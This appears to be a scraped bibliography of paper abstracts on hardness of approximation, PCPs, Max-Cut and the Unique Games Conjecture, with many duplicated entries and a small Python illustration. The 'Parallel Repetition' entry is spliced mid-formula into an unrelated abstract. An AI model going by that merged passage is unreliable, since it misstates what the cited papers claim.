It follows that such a complete problem has a polynomial-time approximation scheme iff the whole class does. These results may help explain the lack of progress on the approximability of a host of optimization problems. --- paper_title: Hardness of approximate hypergraph coloring paper_content: We introduce the notion of covering complexity of a probabilistic verifier. The covering complexity of a verifier on a given input is the minimum number of proofs needed to "satisfy" the verifier on every random string, i.e., on every random string, at least one of the given proofs must be accepted by the verifier. The covering complexity of PCP verifiers offers a promising route to getting stronger inapproximability results for some minimization problems, and in particular (hyper)-graph coloring problems. We present a PCP verifier for NP statements that queries only four bits and yet has a covering complexity of one for true statements and a super-constant covering complexity for statements not in the language. Moreover the acceptance predicate of this verifier is a simple Not-all-Equal check on the four bits it reads. This enables us to prove that for any constant c, it is NP-hard to color a 2-colorable 4-uniform hypergraph using just c colors, and also yields a super-constant inapproximability result under a stronger hardness assumption. --- paper_title: Some optimal inapproximability results paper_content: We prove optimal, up to an arbitrary e > 0, inapproximability results for Max-E k-Sat for k ≥ 3, maximizing the number of satisfied linear equations in an over-determined system of linear equations modulo a prime p and Set Splitting. As a consequence of these results we get improved lower bounds for the efficient approximability of many optimization problems studied previously. In particular, for Max-E2-Sat, Max-Cut, Max-di-Cut, and Vertex cover. --- paper_title: Hardness of approximate hypergraph coloring paper_content: We introduce the notion of covering complexity of a probabilistic verifier. The covering complexity of a verifier on a given input is the minimum number of proofs needed to "satisfy" the verifier on every random string, i.e., on every random string, at least one of the given proofs must be accepted by the verifier. The covering complexity of PCP verifiers offers a promising route to getting stronger inapproximability results for some minimization problems, and in particular (hyper)-graph coloring problems. We present a PCP verifier for NP statements that queries only four bits and yet has a covering complexity of one for true statements and a super-constant covering complexity for statements not in the language. Moreover the acceptance predicate of this verifier is a simple Not-all-Equal check on the four bits it reads. This enables us to prove that for any constant c, it is NP-hard to color a 2-colorable 4-uniform hypergraph using just c colors, and also yields a super-constant inapproximability result under a stronger hardness assumption. --- paper_title: Some optimal inapproximability results paper_content: We prove optimal, up to an arbitrary e > 0, inapproximability results for Max-E k-Sat for k ≥ 3, maximizing the number of satisfied linear equations in an over-determined system of linear equations modulo a prime p and Set Splitting. As a consequence of these results we get improved lower bounds for the efficient approximability of many optimization problems studied previously. In particular, for Max-E2-Sat, Max-Cut, Max-di-Cut, and Vertex cover. 
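A concrete way to see why the Max-E3-Sat bound in the entry above is called optimal: a uniformly random assignment already satisfies each exactly-3-literal clause with probability 7/8, and the cited result says that guaranteeing even slightly more than 7/8 of the clauses is NP-hard. The sketch below just runs that trivial algorithm on a randomly generated instance; the instance size, seed, and clause sampling are arbitrary illustrative choices.

```python
import random

random.seed(0)
n_vars, n_clauses = 50, 400

# Random Max-E3-Sat instance: each clause has 3 distinct variables, each possibly negated.
clauses = []
for _ in range(n_clauses):
    variables = random.sample(range(n_vars), 3)
    clauses.append([(v, random.choice([True, False])) for v in variables])

def clause_satisfied(clause, assignment):
    # A clause is satisfied if at least one of its literals matches the assignment.
    return any(assignment[v] == wanted for v, wanted in clause)

# Trivial randomized algorithm: a single uniformly random assignment.
assignment = [random.choice([True, False]) for _ in range(n_vars)]
fraction = sum(clause_satisfied(c, assignment) for c in clauses) / n_clauses
print(f"random assignment satisfies {fraction:.3f} of the clauses (expectation: 7/8 = 0.875)")
```

Derandomizing this with the method of conditional expectations yields a deterministic 7/8-approximation, which is exactly the threshold the hardness result shows cannot be improved unless P = NP.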
--- paper_title: On the power of unique 2-prover 1-round games paper_content: A 2-prover game is called unique if the answer of one prover uniquely determines the answer of the second prover and vice versa (we implicitly assume games to be one round games). The value of a 2-prover game is the maximum acceptance probability of the verifier over all the prover strategies. We make a conjecture regarding the power of unique 2-prover games, which we call the Unique Games Conjecture. --- paper_title: Inapproximability Results for Sparsest Cut, Optimal Linear Arrangement, and Precedence Constrained Scheduling paper_content: We consider (uniform) sparsest cut, optimal linear arrangement and the precedence constrained scheduling problem 1 | prec | Σ w_j C_j. So far, these three notorious NP-hard problems have resisted all attempts to prove inapproximability results. We show that they have no polynomial time approximation scheme (PTAS), unless NP-complete problems can be solved in randomized subexponential time. Furthermore, we prove that the scheduling problem is as hard to approximate as vertex cover when the so-called fixed cost, that is present in all feasible solutions, is subtracted from the objective function. --- paper_title: Some optimal inapproximability results paper_content: We prove optimal, up to an arbitrary e > 0, inapproximability results for Max-E k-Sat for k ≥ 3, maximizing the number of satisfied linear equations in an over-determined system of linear equations modulo a prime p and Set Splitting. As a consequence of these results we get improved lower bounds for the efficient approximability of many optimization problems studied previously. In particular, for Max-E2-Sat, Max-Cut, Max-di-Cut, and Vertex cover. --- paper_title: Inapproximability of NP-complete problems, discrete fourier analysis, and geometry paper_content: This article gives a survey of recent results that connect three areas in computer science and mathematics: (1) (Hardness of) computing approximate solutions to NP-complete problems. (2) Fourier analysis of boolean functions on boolean hypercube. (3) Certain problems in geometry, especially related to isoperimetry and embeddings between metric spaces. --- paper_title: On the power of unique 2-prover 1-round games paper_content: A 2-prover game is called unique if the answer of one prover uniquely determines the answer of the second prover and vice versa (we implicitly assume games to be one round games). The value of a 2-prover game is the maximum acceptance probability of the verifier over all the prover strategies. We make a conjecture regarding the power of unique 2-prover games, which we call the Unique Games Conjecture. --- paper_title: Optimal inapproximability results for MAX-CUT and other 2-variable CSPs? paper_content: In this paper, we give evidence suggesting that MAX-CUT is NP-hard to approximate to within a factor of α_GW + ε, for all ε > 0, where α_GW denotes the approximation ratio achieved by the Goemans-Williamson algorithm (1995). α_GW ≈ .878567. This result is conditional, relying on two conjectures: a) the unique games conjecture of Khot; and, b) a very believable conjecture we call the majority is stablest conjecture. These results indicate that the geometric nature of the Goemans-Williamson algorithm might be intrinsic to the MAX-CUT problem.
The same two conjectures also imply that it is NP-hard to (β + ε)-approximate MAX-2SAT, where β ≈ .943943 is the minimum of (2 + (2/π)θ)/(3 - cos θ) on (π/2, π). Motivated by our proof techniques, we show that if the MAX-2CSP and MAX-2SAT problems are slightly restricted - in a way that seems to retain all their hardness - then they have (α_GW - ε)- and (β - ε)-approximation algorithms, respectively. Though we are unable to prove the majority is stablest conjecture, we give some partial results and indicate possible directions of attack. Our partial results are enough to imply that MAX-CUT is hard to (3/4 + 1/(2π) + ε)-approximate (≈ .909155), assuming only the unique games conjecture. We also discuss MAX-2CSP problems over non-Boolean domains and state some related results and conjectures. We show, for example, that the unique games conjecture implies that it is hard to approximate MAX-2LIN(q) to within any constant factor. --- paper_title: How good is the Goemans-Williamson MAX CUT algorithm? paper_content: The celebrated semidefinite programming algorithm for MAX CUT introduced by Goemans and Williamson was known to have a performance ratio of at least α = (2/π) · min_{0<θ≤π} θ/(1 - cos θ) (0.87856 < α < 0.87857); the exact performance ratio was unknown. We prove that the performance ratio of their algorithm is exactly α. Furthermore, we show that it is impossible to add valid linear constraints to improve the performance ratio. --- paper_title: On the integrality ratio of semidefinite relaxations of MAX CUT paper_content: MAX CUT is the problem of partitioning the vertices of a graph into two sets, maximizing the number of edges joining these sets. This problem is NP-hard. Goemans and Williamson proposed an algorithm that first uses a semidefinite programming relaxation of MAX CUT to embed the vertices of the graph on the surface of an n dimensional sphere, and then uses a random hyperplane to cut the sphere in two, giving a cut of the graph. They show that the expected number of edges in the random cut is at least α · sdp, where α ≈ 0.87856 and sdp is the value of the semidefinite program. This manuscript shows the following results: 1. The integrality ratio of the semidefinite program is α. The previously known bound on the integrality ratio was roughly 0.8845. 2. In the presence of the so called “triangle constraints”, the integrality ratio is no better than roughly 0.891. The previously known bound was above 0.95. --- paper_title: Parallel Repetition in Projection Games and a Concentration Bound paper_content: A two-player game is played by cooperating players who are not allowed to communicate. A referee asks the players questions sampled from some known distribution and decides whether they win or not based on a known predicate of the questions and the players' answers. The parallel repetition of the game is the game in which the referee samples $n$ independent pairs of questions and sends the corresponding questions to the players simultaneously. If the players cannot win the original game with probability better than $(1-\epsilon)$, what's the best they can do in the repeated game? We improve earlier results of [R. Raz, SIAM J. Comput., 27 (1998), pp. 763-803] and [T. Holenstein, Theory Comput., 5 (2009), pp.
141-172], who showed that the players cannot win all copies in the repeated game with probability better than $(1-\epsilon/2)^{\Omega(n\epsilon^2/c)}$ (here $c$ is the length of the answers in the game), in the following ways: (i) We show that the probability of winning all copies is $(1-\epsilon/2)^{\Omega(\epsilon n)}$ as long as the game is a “projection game,” the type of game most commonly used in hardness of approximation results. (ii) We prove a concentration bound for parallel repetition (of general games) showing that for any constant $0 0$, there exists an alphabet size $M(\epsilon)$ for which it is NP-hard to distinguish a unique game with alphabet size $M$ in which a $(1-\epsilon^2)$ fraction of the constraints can be satisfied from one in which a $(1-\epsilon f(1/\epsilon))$ fraction of the constraints can be satisfied. --- paper_title: Optimal inapproximability results for MAX-CUT and other 2-variable CSPs? paper_content: In this paper, we give evidence suggesting that MAX-CUT is NP-hard to approximate to within a factor of /spl alpha//sub cw/+ /spl epsi/, for all /spl epsi/ > 0, where /spl alpha//sub cw/ denotes the approximation ratio achieved by the Goemans-Williamson algorithm (1995). /spl alpha//sub cw/ /spl ap/ .878567. This result is conditional, relying on two conjectures: a) the unique games conjecture of Khot; and, b) a very believable conjecture we call the majority is stablest conjecture. These results indicate that the geometric nature of the Goemans-Williamson algorithm might be intrinsic to the MAX-CUT problem. The same two conjectures also imply that it is NP-hard to (/spl beta/ + /spl epsi/)-approximate MAX-2SAT, where /spl beta/ /spl ap/ .943943 is the minimum of (2 + (2//spl pi/) /spl theta/)/(3 - cos(/spl theta/)) on (/spl pi//2, /spl pi/). Motivated by our proof techniques, we show that if the MAX-2CSP and MAX-2SAT problems are slightly restricted - in a way that seems to retain all their hardness -then they have (/spl alpha//sub GW/-/spl epsi/)- and (/spl beta/ - /spl epsi/)-approximation algorithms, respectively. Though we are unable to prove the majority is stablest conjecture, we give some partial results and indicate possible directions of attack. Our partial results are enough to imply that MAX-CUT is hard to (3/4 + 1/(2/spl pi/) + /spl epsi/)-approximate (/spl ap/ .909155), assuming only the unique games conjecture. We also discuss MAX-2CSP problems over non-Boolean domains and state some related results and conjectures. We show, for example, that the unique games conjecture implies that it is hard to approximate MAX-2LIN(q) to within any constant factor. --- paper_title: Conditional hardness for approximate coloring paper_content: We study the AprxColoring$(q,Q)$ problem: Given a graph $G$, decide whether $\chi(G)\le q$ or $\chi(G)\ge Q$. We present hardness results for this problem for any constants $3\le q<Q$. For $q\ge4$, our result is based on Khot's 2-to-1 label cover, which is conjectured to be NP-hard [S. Khot, Proceedings of the 34th Annual ACM Symposium on Theory of Computing, 2002, pp. 767-775]. For $q=3$, we base our hardness result on a certain “${\rhd\hskip-0.5em<}$-shaped” variant of his conjecture. Previously no hardness result was known for $q=3$ and $Q\ge6$. At the heart of our proof are tight bounds on generalized noise-stability quantities, which extend the recent work of Mossel, O'Donnell, and Oleszkiewicz [“Noise stability of functions with low influences: Invariance and optimality,” Ann. of Math. 
(2), to appear] and should have wider applicability. --- paper_title: New approximation guarantee for chromatic number paper_content: We describe how to color every 3-colorable graph with O(n0.2111) colors, thus improving an algorithm of Blum and Karger from almost a decade ago. Our analysis uses new geometric ideas inspired by the recent work of Arora, Rao, and Vazirani on SPARSEST CUT, and these ideas show promise of leading to further improvements. --- paper_title: Inapproximability of NP-complete problems, discrete fourier analysis, and geometry paper_content: This article gives a survey of recent results that connect three areas in com- puter science and mathematics: (1) (Hardness of) computing approximate solutions to NP-complete problems. (2) Fourier analysis of boolean functions on boolean hypercube. (3) Certain problems in geometry, especially related to isoperimetry and embeddings between metric spaces. --- paper_title: On the power of unique 2-prover 1-round games paper_content: A 2-prover game is called unique if the answer of one prover uniquely determines the answer of the second prover and vice versa (we implicitly assume games to be one round games). The value of a 2-prover game is the maximum acceptance probability of the verifier over all the prover strategies. We make a conjecture regarding the power of unique 2-prover games, which we call the Unique Games Conjecture. --- paper_title: Approximation Resistant Predicates from Pairwise Independence paper_content: We study the approximability of predicates on k variables from a domain [q], and give a new sufficient condition for such predicates to be approximation resistant under the Unique Games Conjecture. ... --- paper_title: Gowers uniformity, influence of variables, and PCPs paper_content: Gowers introduced, for d\geq 1, the notion of dimension-d uniformity U^d(f) of a function f: G -> \C, where G is a finite abelian group and \C are the complex numbers. Roughly speaking, if U^d(f) is small, then f has certain "pseudorandomness" properties. ::: We prove the following property of functions with large U^d(f). Write G=G_1 x >... x G_n as a product of groups. If a bounded balanced function f:G_1 x ... x G_n -> \C is such that U^{d} (f) > epsilon, then one of the coordinates of f has influence at least epsilon/2^{O(d)}. ::: The Gowers inner product of a collection of functions is a related notion of pseudorandomness. We prove that if a collection of bounded functions has large Gowers inner product, and at least one function in the collection is balanced, then there is a variable that has high influence for at least four of the functions in the collection. ::: Finally, we relate the acceptance probability of the "hypergraph long-code test" proposed by Samorodnitsky and Trevisan to the Gowers inner product of the functions being tested and we deduce applications to the construction of Probabilistically Checkable Proofs and to hardness of approximation. --- paper_title: Optimal algorithms and inapproximability results for every CSP? paper_content: Semidefinite Programming(SDP) is one of the strongest algorithmic techniques used in the design of approximation algorithms. In recent years, Unique Games Conjecture(UGC) has proved to be intimately connected to the limitations of Semidefinite Programming. Making this connection precise, we show the following result : If UGC is true, then for every constraint satisfaction problem(CSP) the best approximation ratio is given by a certain simple SDP. 
Specifically, we show a generic conversion from SDP integrality gaps to UGC hardness results for every CSP. This result holds both for maximization and minimization problems over arbitrary finite domains. Using this connection between integrality gaps and hardness results we obtain a generic polynomial-time algorithm for all CSPs. Assuming the Unique Games Conjecture, this algorithm achieves the optimal approximation ratio for every CSP. Unconditionally, for all 2-CSPs the algorithm achieves an approximation ratio equal to the integrality gap of a natural SDP used in literature. Further the algorithm achieves at least as good an approximation ratio as the best known algorithms for several problems like MaxCut, Max2Sat, MaxDiCut and Unique Games. --- paper_title: Towards computing the grothendieck constant paper_content: The Grothendieck constant KG is the smallest constant such that for every d ∈ N and every matrix A = (aij), ::: ::: [EQUATION] ::: ::: where B(d) is the unit ball in Rd. Despite several efforts [15, 23], the value of the constant KG remains unknown. The Grothendieck constant KG is precisely the integrality gap of a natural SDP relaxation for the KM, N-Quadratic Programming problem. The input to this problem is a matrix A = (aij) and the objective is to maximize the quadratic form Σij aijxiyj over xiyj ∈ [−1, 1]. ::: ::: In this work, we apply techniques from [22] to the KM, N-Quadratic Programming problem. Using some standard but non-trivial modifications, the reduction in [22] yields the following hardness result: Assuming the Unique Games Conjecture [9], it is NP-hard to approximate the KM, N-Quadratic Programming problem to any factor better than the Grothendieck constant KG. ::: ::: By adapting a "bootstrapping" argument used in a proof of Grothendieck inequality [5], we are able to perform a tighter analysis than [22]. Through this careful analysis, we obtain the following new results: ::: ::: • An approximation algorithm for KM, N-Quadratic Programming that is guaranteed to achieve an approximation ratio arbitrarily close to the Grothendieck constant KG (optimal approximation ratio assuming the Unique Games Conjecture). ::: ::: • We show that the Grothendieck constant KG can be computed within an error η, in time depending only on η. Specifically, for each η, we formulate an explicit finite linear program, whose optimum is η-close to the Grothendieck constant. ::: ::: We also exhibit a simple family of operators on the Gaussian Hilbert space that is guaranteed to contain tight examples for the Grothendieck inequality. --- paper_title: Sdp gaps and ugc hardness for multiway cut, 0-extension, and metric labeling paper_content: The connection between integrality gaps and computational hardness of discrete optimization problems is an intriguing question. In recent years, this connection has prominently figured in several tight UGC-based hardness results. We show in this paper a direct way of turning integrality gaps into hardness results for several fundamental classification problems. Specifically, we convert linear programming integrality gaps for the Multiway Cut, 0-Extension, and and Metric Labeling problems into UGC-based hardness results. Qualitatively, our result suggests that if the unique games conjecture is true then a linear relaxation of the latter problems studied in several papers (so-called earthmover linear program) yields the best possible approximation. 
Taking this a step further, we also obtain integrality gaps for a semi-definite programming relaxation matching the integrality gaps of the earthmover linear program. Prior to this work, there was an intriguing possibility of obtaining better approximation factors for labeling problems via semi-definite programming. --- paper_title: Optimal inapproximability results for MAX-CUT and other 2-variable CSPs? paper_content: In this paper, we give evidence suggesting that MAX-CUT is NP-hard to approximate to within a factor of /spl alpha//sub cw/+ /spl epsi/, for all /spl epsi/ > 0, where /spl alpha//sub cw/ denotes the approximation ratio achieved by the Goemans-Williamson algorithm (1995). /spl alpha//sub cw/ /spl ap/ .878567. This result is conditional, relying on two conjectures: a) the unique games conjecture of Khot; and, b) a very believable conjecture we call the majority is stablest conjecture. These results indicate that the geometric nature of the Goemans-Williamson algorithm might be intrinsic to the MAX-CUT problem. The same two conjectures also imply that it is NP-hard to (/spl beta/ + /spl epsi/)-approximate MAX-2SAT, where /spl beta/ /spl ap/ .943943 is the minimum of (2 + (2//spl pi/) /spl theta/)/(3 - cos(/spl theta/)) on (/spl pi//2, /spl pi/). Motivated by our proof techniques, we show that if the MAX-2CSP and MAX-2SAT problems are slightly restricted - in a way that seems to retain all their hardness -then they have (/spl alpha//sub GW/-/spl epsi/)- and (/spl beta/ - /spl epsi/)-approximation algorithms, respectively. Though we are unable to prove the majority is stablest conjecture, we give some partial results and indicate possible directions of attack. Our partial results are enough to imply that MAX-CUT is hard to (3/4 + 1/(2/spl pi/) + /spl epsi/)-approximate (/spl ap/ .909155), assuming only the unique games conjecture. We also discuss MAX-2CSP problems over non-Boolean domains and state some related results and conjectures. We show, for example, that the unique games conjecture implies that it is hard to approximate MAX-2LIN(q) to within any constant factor. --- paper_title: Approximation algorithms for unique games paper_content: We present a polynomial time algorithm based on semidefinite programming that, given a unique game of value 1 - O(1/logn), satisfies a constant fraction of constraints, where n is the number of variables. For sufficiently large alphabets, it improves an algorithm of Khot (STOC'02) that satisfies a constant fraction of constraints in unique games of value 1 -O(1/(k/sup 10/(log k)/sup 5/)), where k is the size of the alphabet. We also present a simpler algorithm for the special case of unique games with linear constraints. Finally, we present a simple approximation algorithm for 2-to-1 games. --- paper_title: On the power of unique 2-prover 1-round games paper_content: A 2-prover game is called unique if the answer of one prover uniquely determines the answer of the second prover and vice versa (we implicitly assume games to be one round games). The value of a 2-prover game is the maximum acceptance probability of the verifier over all the prover strategies. We make a conjecture regarding the power of unique 2-prover games, which we call the Unique Games Conjecture. --- paper_title: Approximating unique games paper_content: The UNIQUE GAMES problem is the following: we are given a graph G = (V, E), with each edge e = (u, v) having a weight w e and a permutation π uv on [k]. 
The objective is to find a labeling of each vertex u with a label f u ∈ [k] to minimize the weight of unsatisfied edges---where an edge (u, v) is satisfied if f v = π uv (f u ).The Unique Games Conjecture of Khot [8] essentially says that for each e > 0, there is a k such that it is NP-hard to distinguish instances of Unique games with (1-e) satisfiable edges from those with only e satisfiable edges. Several hardness results have recently been proved based on this assumption, including optimal ones for Max-Cut, Vertex-Cover and other problems, making it an important challenge to prove or refute the conjecture.In this paper, we give an O(log n)-approximation algorithm for the problem of minimizing the number of unsatisfied edges in any Unique game. Previous results of Khot [8] and Trevisan [12] imply that if the optimal solution has OPT = em unsatisfied edges, semidefinite relaxations of the problem could give labelings with min {k2e1/5, (e log n)1/2}m unsatisfied edges. In this paper we show how to round a LP relaxation to get an O(log n)-approximation to the problem; i.e., to find a labeling with only O(em log n) = O(OPT log n) unsatisfied edges. --- paper_title: How to Play Unique Games Using Embeddings paper_content: In this paper we present a new approximation algorithm for Unique Games. For a Unique Game with n vertices and k states (labels), if a (1 - \varepsilon) fraction of all constraints is satisfiable, the algorithm finds an assignment satisfying a 1 - O\left( {\varepsilon \sqrt {\log n\log k} } \right) fraction of all constraints. To this end, we introduce new embedding techniques for rounding semidefinite relaxations of problems with large domain size. --- paper_title: Approximation algorithms for unique games paper_content: We present a polynomial time algorithm based on semidefinite programming that, given a unique game of value 1 - O(1/logn), satisfies a constant fraction of constraints, where n is the number of variables. For sufficiently large alphabets, it improves an algorithm of Khot (STOC'02) that satisfies a constant fraction of constraints in unique games of value 1 -O(1/(k/sup 10/(log k)/sup 5/)), where k is the size of the alphabet. We also present a simpler algorithm for the special case of unique games with linear constraints. Finally, we present a simple approximation algorithm for 2-to-1 games. --- paper_title: Approximating unique games paper_content: The UNIQUE GAMES problem is the following: we are given a graph G = (V, E), with each edge e = (u, v) having a weight w e and a permutation π uv on [k]. The objective is to find a labeling of each vertex u with a label f u ∈ [k] to minimize the weight of unsatisfied edges---where an edge (u, v) is satisfied if f v = π uv (f u ).The Unique Games Conjecture of Khot [8] essentially says that for each e > 0, there is a k such that it is NP-hard to distinguish instances of Unique games with (1-e) satisfiable edges from those with only e satisfiable edges. Several hardness results have recently been proved based on this assumption, including optimal ones for Max-Cut, Vertex-Cover and other problems, making it an important challenge to prove or refute the conjecture.In this paper, we give an O(log n)-approximation algorithm for the problem of minimizing the number of unsatisfied edges in any Unique game. 
Previous results of Khot [8] and Trevisan [12] imply that if the optimal solution has OPT = em unsatisfied edges, semidefinite relaxations of the problem could give labelings with min {k2e1/5, (e log n)1/2}m unsatisfied edges. In this paper we show how to round a LP relaxation to get an O(log n)-approximation to the problem; i.e., to find a labeling with only O(em log n) = O(OPT log n) unsatisfied edges. --- paper_title: How to Play Unique Games Using Embeddings paper_content: In this paper we present a new approximation algorithm for Unique Games. For a Unique Game with n vertices and k states (labels), if a (1 - \varepsilon) fraction of all constraints is satisfiable, the algorithm finds an assignment satisfying a 1 - O\left( {\varepsilon \sqrt {\log n\log k} } \right) fraction of all constraints. To this end, we introduce new embedding techniques for rounding semidefinite relaxations of problems with large domain size. --- paper_title: On the power of unique 2-prover 1-round games paper_content: A 2-prover game is called unique if the answer of one prover uniquely determines the answer of the second prover and vice versa (we implicitly assume games to be one round games). The value of a 2-prover game is the maximum acceptance probability of the verifier over all the prover strategies. We make a conjecture regarding the power of unique 2-prover games, which we call the Unique Games Conjecture. --- paper_title: Approximation algorithms for unique games paper_content: We present a polynomial time algorithm based on semidefinite programming that, given a unique game of value 1 - O(1/logn), satisfies a constant fraction of constraints, where n is the number of variables. For sufficiently large alphabets, it improves an algorithm of Khot (STOC'02) that satisfies a constant fraction of constraints in unique games of value 1 -O(1/(k/sup 10/(log k)/sup 5/)), where k is the size of the alphabet. We also present a simpler algorithm for the special case of unique games with linear constraints. Finally, we present a simple approximation algorithm for 2-to-1 games. --- paper_title: Multicommodity max-flow min-cut theorems and their use in designing approximation algorithms paper_content: In this paper, we establish max-flow min-cut theorems for several important classes of multicommodity flow problems. In particular, we show that for any n-node multicommodity flow problem with uniform demands, the max-flow for the problem is within an O(log n) factor of the upper bound implied by the min-cut. The result (which is existentially optimal) establishes an important analogue of the famous 1-commodity max-flow min-cut theorem for problems with multiple commodities. The result also has substantial applications to the field of approximation algorithms. For example, we use the flow result to design the first polynomial-time (polylog n-times-optimal) approximation algorithms for well-known NP-hard optimization problems such as graph partitioning, min-cut linear arrangement, crossing number, VLSI layout, and minimum feedback arc set. Applications of the flow results to path routing problems, network reconfiguration, communication in distributed networks, scientific computing and rapidly mixing Markov chains are also described in the paper. 
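For reference, the uniform flow-cut gap discussed in the preceding entry can be stated compactly (a standard formulation, not quoted from the paper): for a graph $G=(V,E)$ with $n=|V|$, unit-capacity edges, and a unit demand between every pair of vertices, let $f^{*}(G)$ denote the maximum concurrent flow and let
\[
\Phi(G)=\min_{\emptyset\neq S\subsetneq V}\frac{|E(S,V\setminus S)|}{|S|\,|V\setminus S|}
\]
be the (uniform) sparsest cut. Then $f^{*}(G)\le\Phi(G)\le O(\log n)\cdot f^{*}(G)$, and the $O(\log n)$ factor is existentially tight, e.g. on constant-degree expanders.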
--- paper_title: How to Play Unique Games on Expanders paper_content: In this note we improve a recent result by Arora, Khot, Kolla, Steurer, Tulsiani, and Vishnoi on solving the Unique Games problem on expanders. Given a $(1-\varepsilon)$-satisfiable instance of Unique Games with the constraint graph $G$, our algorithm finds an assignment satisfying at least a $1- C \varepsilon/h_G$ fraction of all constraints if $\varepsilon<c \lambda_G$ where $h_G$ is the edge expansion of $G$, $\lambda_G$ is the second smallest eigenvalue of the Laplacian of $G$, and $C$ and $c$ are some absolute constants. --- paper_title: Spectral Algorithms for Unique Games paper_content: We present a new algorithm for Unique Games which is based on purely spectral techniques, in contrast to previous work in the area, which relies heavily on semidefinite programming (SDP). Given a highly satisfiable instance of Unique Games, our algorithm is able to recover a good assignment. The approximation guarantee depends only on the completeness of the game, and not on the alphabet size, while the running time depends on spectral properties of the Label-Extended graph associated with the instance of Unique Games. In particular, we show how our techniques imply a quasi-polynomial time algorithm that decides satisfiability of a game on the Khot-Vishnoi [KV] integrality gap instance. Notably, when run on that instance, the standard SDP relaxation of Unique Games fails. As a special case, we also show how to re-derive a polynomial time algorithm for Unique Games on expander constraint graphs (similar to [AKKTSV]) and a sub-exponential time algorithm for Unique Games on the Hypercube. --- paper_title: Graph expansion and the unique games conjecture paper_content: The edge expansion of a subset of vertices S ⊆ V in a graph G measures the fraction of edges that leave S. In a d-regular graph, the edge expansion/conductance Φ(S) of a subset S ⊆ V is defined as Φ(S) = (|E(S, V\S)|)/(d|S|).
Approximating the conductance of small linear sized sets (size δ n) is a natural optimization question that is a variant of the well-studied Sparsest Cut problem. However, there are no known algorithms to even distinguish between almost complete edge expansion (Φ(S) = 1-ε), and close to 0 expansion. In this work, we investigate the connection between Graph Expansion and the Unique Games Conjecture. Specifically, we show the following: We show that a simple decision version of the problem of approximating small set expansion reduces to Unique Games. Thus if approximating edge expansion of small sets is hard, then Unique Games is hard. Alternatively, a refutation of the UGC will yield better algorithms to approximate edge expansion in graphs. This is the first non-trivial "reverse" reduction from a natural optimization problem to Unique Games. Under a slightly stronger UGC that assumes mild expansion of small sets, we show that it is UG-hard to approximate small set expansion. On instances with sufficiently good expansion of small sets, we show that Unique Games is easy by extending the techniques of [4]. --- paper_title: Inapproximability of NP-complete problems, discrete fourier analysis, and geometry paper_content: This article gives a survey of recent results that connect three areas in com- puter science and mathematics: (1) (Hardness of) computing approximate solutions to NP-complete problems. (2) Fourier analysis of boolean functions on boolean hypercube. (3) Certain problems in geometry, especially related to isoperimetry and embeddings between metric spaces. --- paper_title: Proof verification and the hardness of approximation problems paper_content: We show that every language in NP has a probablistic verifier that checks membership proofs for it using logarithmic number of random bits and by examining a constant number of bits in the proof. If a string is in the language, then there exists a proof such that the verifier accepts with probability 1 (i.e., for every choice of its random string). For strings not in the language, the verifier rejects every provided “proof” with probability at least 1/2. Our result builds upon and improves a recent result of Arora and Safra [1998] whose verifiers examine a nonconstant number of bits in the proof (though this number is a very slowly growing function of the input length). ::: As a consequence, we prove that no MAX SNP-hard problem has a polynomial time approximation scheme, unless NP = P. The class MAX SNP was defined by Papadimitriou and Yannakakis [1991] and hard problems for this class include vertex cover, maximum satisfiability, maximum cut, metric TSP, Steiner trees and shortest superstring. We also improve upon the clique hardness results of Feige et al. [1996] and Arora and Safra [1998] and show that there exists a positive ε such that approximating the maximum clique size in an N-vertex graph to within a factor of Nε is NP-hard. --- paper_title: On the power of unique 2-prover 1-round games paper_content: A 2-prover game is called unique if the answer of one prover uniquely determines the answer of the second prover and vice versa (we implicitly assume games to be one round games). The value of a 2-prover game is the maximum acceptance probability of the verifier over all the prover strategies. We make a conjecture regarding the power of unique 2-prover games, which we call the Unique Games Conjecture. 
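For orientation, the Unique Games problem and the conjecture invoked throughout these entries can be written as follows (paraphrasing the definitions quoted above, not any single paper): an instance consists of a constraint graph $G=(V,E)$, a label set $[k]$, and a bijection $\pi_{uv}:[k]\to[k]$ for each edge $(u,v)\in E$; its value is
\[
\mathrm{val}(\mathcal{G})=\max_{f:V\to[k]}\ \frac{1}{|E|}\,\bigl|\{(u,v)\in E : f(v)=\pi_{uv}(f(u))\}\bigr|.
\]
The Unique Games Conjecture asserts that for every $\varepsilon>0$ there is a $k=k(\varepsilon)$ such that it is NP-hard to distinguish instances with $\mathrm{val}\ge 1-\varepsilon$ from instances with $\mathrm{val}\le\varepsilon$.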
--- paper_title: An Approximate Zero-One Law paper_content: We prove an approximate zero-one law, which holds for finite Bernoulli schemes. An application to percolation theory is given. --- paper_title: Finite metric spaces: combinatorics, geometry and algorithms paper_content: In the last several years a number of very interesting results were proved about finite metric spaces. Some of this work is motivated by practical considerations: Large data sets (coming e.g. from computational molecular biology, brain research or data mining) can be viewed as large metric spaces that should be analyzed (e.g. correctly clustered).On the other hand, these investigations connect to some classical areas of geometry - the asymptotic theory of finite-dimensional normed spaces and differential geometry. Finally, the metric theory of finite graphs has proved very useful in the study of graphs per se and the design of approximation algorithms for hard computational problems. In this talk I will try to explain some of the results and review some of the emerging new connections and the many fascinating open problems in this area. --- paper_title: Semidefinite Programming in Combinatorial Optimization paper_content: We discuss the use of semidefinite programming for combinatorial optimization problems. The main topics covered include (i) the Lovasz theta function and its applications to stable sets, perfect graphs, and coding theory, (ii) the automatic generation of strong valid inequalities, (iii) the maximum cut problem and related problems, and (iv) the embedding of finite metric spaces and its relationship to the sparsest cut problem. --- paper_title: On the power of unique 2-prover 1-round games paper_content: A 2-prover game is called unique if the answer of one prover uniquely determines the answer of the second prover and vice versa (we implicitly assume games to be one round games). The value of a 2-prover game is the maximum acceptance probability of the verifier over all the prover strategies. We make a conjecture regarding the power of unique 2-prover games, which we call the Unique Games Conjecture. --- paper_title: The Unique Games Conjecture, Integrality Gap for Cut Problems and Embeddability of Negative Type Metrics into ℓ1 paper_content: In this paper, we disprove a conjecture of Goemans and Linial; namely, that every negative type metric embeds into $\ell_1$ with constant distortion. We show that for an arbitrarily small constant $\delta> 0$, for all large enough $n$, there is an $n$-point negative type metric which requires distortion at least $(\log\log n)^{1/6-\delta}$ to embed into $\ell_1.$ ::: Surprisingly, our construction is inspired by the Unique Games Conjecture (UGC) of Khot, establishing a previously unsuspected connection between probabilistically checkable proof systems (PCPs) and the theory of metric embeddings. We first prove that the UGC implies a super-constant hardness result for the (non-uniform) Sparsest Cut problem. Though this hardness result relies on the UGC, we demonstrate, nevertheless, that the corresponding PCP reduction can be used to construct an "integrality gap instance" for Sparsest Cut. Towards this, we first construct an integrality gap instance for a natural SDP relaxation of Unique Games. Then we "simulate" the PCP reduction and "translate" the integrality gap instance of Unique Games to an integrality 